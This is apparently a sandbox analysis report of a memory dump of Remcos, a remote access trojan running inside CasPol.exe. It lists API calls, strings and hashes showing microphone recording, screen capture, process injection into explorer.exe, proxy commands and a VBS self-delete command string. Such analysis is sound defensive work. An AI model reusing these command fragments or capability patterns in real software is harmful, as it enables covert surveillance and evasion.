                                                                                                                      • _free.LIBCMT ref: 0045011A
                                                                                                                      • _free.LIBCMT ref: 0045012D
                                                                                                                      • _free.LIBCMT ref: 0045013B
                                                                                                                      • _free.LIBCMT ref: 00450146
                                                                                                                      • _free.LIBCMT ref: 0045017E
                                                                                                                      • _free.LIBCMT ref: 00450185
                                                                                                                      • _free.LIBCMT ref: 004501A2
                                                                                                                      • _free.LIBCMT ref: 004501BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 161543041-0
                                                                                                                      • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                      • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                                                                                      • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                      • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                                                                                      APIs
                                                                                                                      • __EH_prolog.LIBCMT ref: 0041913D
                                                                                                                      • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                                                                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                      • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                      • API String ID: 489098229-65789007
                                                                                                                      • Opcode ID: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                                                                                                                      • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                                                                                      • Opcode Fuzzy Hash: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                                                                                                                      • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                        • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                        • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                        • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                        • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                      • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                      • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                      • API String ID: 1913171305-390638927
                                                                                                                      • Opcode ID: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                                                                                                                      • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                                                                                                      • Opcode Fuzzy Hash: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                                                                                                                      • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 269201875-0
                                                                                                                      • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                      • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                                                                                      • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                      • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                                                                                      • GetLastError.KERNEL32 ref: 00454AA6
                                                                                                                      • __dosmaperr.LIBCMT ref: 00454AAD
                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                                                                                      • GetLastError.KERNEL32 ref: 00454AC3
                                                                                                                      • __dosmaperr.LIBCMT ref: 00454ACC
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00454C36
                                                                                                                      • GetLastError.KERNEL32 ref: 00454C68
                                                                                                                      • __dosmaperr.LIBCMT ref: 00454C6F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                      • String ID: H
                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                      • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                      • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                                                                                      • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                      • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 65535$udp
                                                                                                                      • API String ID: 0-1267037602
                                                                                                                      • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                      • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                                                                                      • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                      • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                                                                                      • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                                                                                      • __dosmaperr.LIBCMT ref: 004393DD
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                                                                                      • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                                                                                      • __dosmaperr.LIBCMT ref: 0043941A
                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                                                                                      • __dosmaperr.LIBCMT ref: 0043946E
                                                                                                                      • _free.LIBCMT ref: 0043947A
                                                                                                                      • _free.LIBCMT ref: 00439481
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2441525078-0
                                                                                                                      • Opcode ID: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                                                                      • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                                                                                                      • Opcode Fuzzy Hash: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                                                                      • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                                                                                                      APIs
                                                                                                                      • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                      • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                      • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                      • API String ID: 2956720200-749203953
                                                                                                                      • Opcode ID: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
                                                                                                                      • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                                                                                                      • Opcode Fuzzy Hash: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
                                                                                                                      • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                      • String ID: <$@$@FG$@FG$Temp
                                                                                                                      • API String ID: 1107811701-2245803885
                                                                                                                      • Opcode ID: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
                                                                                                                      • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                                                                                                      • Opcode Fuzzy Hash: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
                                                                                                                      • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                      • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess
                                                                                                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                      • API String ID: 2050909247-4145329354
                                                                                                                      • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                      • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                                                                                                      • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                      • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 221034970-0
                                                                                                                      • Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                                                                      • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                                                                                      • Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                                                                      • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00446DEF
                                                                                                                        • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                        • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                      • _free.LIBCMT ref: 00446DFB
                                                                                                                      • _free.LIBCMT ref: 00446E06
                                                                                                                      • _free.LIBCMT ref: 00446E11
                                                                                                                      • _free.LIBCMT ref: 00446E1C
                                                                                                                      • _free.LIBCMT ref: 00446E27
                                                                                                                      • _free.LIBCMT ref: 00446E32
                                                                                                                      • _free.LIBCMT ref: 00446E3D
                                                                                                                      • _free.LIBCMT ref: 00446E48
                                                                                                                      • _free.LIBCMT ref: 00446E56
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                      • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                                                                                      • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                      • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Eventinet_ntoa
                                                                                                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                      • API String ID: 3578746661-4192532303
                                                                                                                      • Opcode ID: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
                                                                                                                      • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                                      • Opcode Fuzzy Hash: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
                                                                                                                      • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                                      APIs
                                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DecodePointer
                                                                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                      • API String ID: 3527080286-3064271455
                                                                                                                      • Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                                      • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                                                                                      • Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                                      • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                                                                                      APIs
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                        • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                      • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                      • API String ID: 1462127192-2001430897
                                                                                                                      • Opcode ID: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                                                                                                                      • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                                      • Opcode Fuzzy Hash: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                                                                                                                      • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                                      APIs
                                                                                                                      • _strftime.LIBCMT ref: 00401AD3
                                                                                                                        • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                      • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                      • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                      • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                      • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                      • API String ID: 3809562944-3643129801
                                                                                                                      • Opcode ID: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
                                                                                                                      • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                                      • Opcode Fuzzy Hash: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
                                                                                                                      • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                                      APIs
                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                      • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                      • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                      • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                      • waveInStart.WINMM ref: 00401A81
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                      • String ID: XCG$`=G$x=G
                                                                                                                      • API String ID: 1356121797-903574159
                                                                                                                      • Opcode ID: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
                                                                                                                      • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                                      • Opcode Fuzzy Hash: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
                                                                                                                      • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                        • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                        • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                        • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                      • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                      • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                      • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                      • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                      • String ID: Remcos
                                                                                                                      • API String ID: 1970332568-165870891
                                                                                                                      • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                      • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                                      • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                      • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
                                                                                                                      • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
